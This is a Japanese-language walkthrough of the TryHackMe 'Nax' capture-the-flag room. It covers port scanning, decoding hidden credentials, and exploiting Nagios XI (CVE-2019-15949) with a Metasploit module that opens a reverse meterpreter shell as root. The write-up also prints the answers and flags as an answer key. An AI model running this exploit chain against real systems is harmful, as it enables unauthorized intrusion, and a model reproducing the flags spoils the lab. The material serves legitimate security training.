【TryHackMe】Nax：Walkthrough

概要

TryHackMe「Nax」のWalkthroughです。

Task1

Q1.What hidden file did you find?

ポートスキャンを実行します。

$ nmap -Pn -T4 -sVC -A -p- 10.10.221.5 -oN nmap_result
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 62:1d:d9:88:01:77:0a:52:bb:59:f9:da:c1:a6:e3:cd (RSA)
|   256 af:67:7d:24:e5:95:f4:44:72:d1:0c:39:8d:cc:21:15 (ECDSA)
|_  256 20:28:15:ef:13:c8:9f:b8:a7:0f:50:e6:2f:3b:1e:57 (ED25519)
25/tcp   open  smtp       Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-03-23T23:42:04
|_Not valid after:  2030-03-21T23:42:04
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: ubuntu.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp  open  ldap       OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http   Apache httpd 2.4.18 ((Ubuntu))
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=192.168.85.153/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2020-03-24T00:14:58
|_Not valid after:  2030-03-22T00:14:58
| tls-alpn: 
|_  http/1.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)

ポートの稼働状況が分かりました。

ポート	サービス	バージョン
22	ssh	OpenSSH 7.2p2
25	smtp	Postfix smtpd
80	http	Apache httpd 2.4.18
389	ldap	OpenLDAP 2.2.X - 2.3.X
443	ssl/http	Apache httpd 2.4.18

80番ポートにアクセスします。

Welcome to elementsという文字とともに元素記号が記載されています。

それぞれの元素記号を元素番号に変換します。

Ag - Hg - Ta - Sb - Po - Pd - Hg - Pt - Lr
47 - 80 - 73 - 51 - 84 - 46 - 80 - 78 - 103

数字をdecimal変換するとパスを発見できました。

A./PI3T.PNg

Q2.Who is the creator of the file?

/PI3T.PNgへアクセスします。

これはpietというプログラミング言語で書かれてたものです。

A.Piet Mondrian

Q4.What is the username you found?

下記サイトでデコードします。

ユーザー名とパスワードが分かりました。

A.nagiosadmin

Q5.What is the password you found?

Hint.% is a separator

A.n3p3UQ&9BjLp4$7uhWdY

Q6.What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000

ディレクトリスキャンをします。

$ dirsearch -u http://10.10.20.93

[00:58:30] 200 -    1KB - /index.php
[00:58:31] 200 -    1KB - /index.php/login/
[00:58:32] 301 -  315B  - /javascript  ->  http://10.10.20.93/javascript/
[00:58:43] 401 -  458B  - /nagios
[00:58:43] 401 -  458B  - /nagios/

/nagiosxi/login.phpから得られた認証情報でログインします。

ダッシュボードのフッターからNagios XI 5.5.6だと分かりました。

脆弱性を探すとMetasploitのモジュールが見つかりました。

$ searchsploit "nagios xi"

(省略)

Nagios XI - Authenticated Remote Command Execution (Metasploit)                           | linux/remote/48191.rb

ソースコードからCVEを確認できました。

/usr/share/exploitdb/exploits/linux/remote/48191.rb

'References'      =>
        [
          ['CVE', '2019-15949'],
          ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] #original PHP exploit
        ],

A.CVE-2019-15949

Q8.After Metasploit has started, let's search for our target exploit using the command 'search applicationame'. What is the full path (starting with exploit) for the exploitation module?

Hint.check with MSF6+

Metasploitを起動し、モジュールを検索します。

msf6 > search nagios xi

(省略)

18  exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce  2019-07-29       excellent  Yes    Nagios XI Prior to 5.6.6 getprofile.sh Authenticated Remote Command Execution

A.exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce

Q9.Compromise the machine and locate user.txt

オプションを設定します。

msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce):

   Name            Current Setting       Required  Description
   ----            ---------------       --------  -----------
   FINISH_INSTALL  false                 no        If the Nagios XI installation has not been completed, try to do so. Thi
                                                   s includes signing the license agreement.
   PASSWORD        n3p3UQ&9BjLp4$7uhWdY  yes       Password to authenticate with
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          10.10.20.93           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasplo
                                                   it/basics/using-metasploit.html
   RPORT           80                    yes       The target port (TCP)
   SSL             false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/            yes       The base path to the Nagios XI application
   URIPATH                               no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin           yes       Username to authenticate with
   VHOST                                 no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
                                       cal machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.6.55.144      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux (x64)

モジュールを実行するとroot権限のシェルを取得できました。

msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > exploit

[*] Started reverse TCP handler on 10.6.55.144:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.5.6.
[+] The target appears to be vulnerable.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting up to 300 seconds for the plugin to request the final payload...
[*] Sending stage (3045380 bytes) to 10.10.20.93
[*] Meterpreter session 1 opened (10.6.55.144:4444 -> 10.10.20.93:37550) at 2024-11-08 01:27:38 -0500
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.

meterpreter > shell
Process 15163 created.
Channel 1 created.
whoami
root

/home/galand/user.txtからユーザーフラグを入手できました。

/home/galand/user.txt

THM{84b17add1d72a9f2e99c33bc568ae0f1}

A.THM{84b17add1d72a9f2e99c33bc568ae0f1}

Q.Locate root.txt

/root/root.txtからルートフラグを入手できます。

/root/root.txt

THM{c89b2e39c83067503a6508b21ed6e962}

A.THM{c89b2e39c83067503a6508b21ed6e962}